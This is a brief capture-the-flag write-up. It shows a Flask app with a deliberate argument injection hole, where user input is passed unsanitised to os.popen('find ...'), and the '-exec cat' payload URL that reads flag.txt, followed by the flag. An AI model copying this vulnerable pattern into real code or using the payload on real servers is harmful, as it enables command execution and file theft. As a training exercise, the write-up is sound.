Find the flag
Description: Flag is in flag.txt
Author: Av4nth1ka
Solution:
This challenge is basically Arguement injection using find command. We are given with the main.py:
import os
from flask import Flask, request, render_template
app = Flask(__name__)
@app.get('/')
def index():
test = request.args.get('test', None)
if test is None:
return render_template('index.html')
command = f"find {test}"
try:
output = os.popen(command).read()
except Exception as e:
output = f"Error: {str(e)}"
return render_template('index.html', output=output)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
Intended payload for flag: flag.txt -exec cat {} ;
http://localhost:5000/?test=flag.txt%20-exec%20cat%20{}%20;
Flag: shaktictf{finally_you found_the_flag_hehehheh!}
%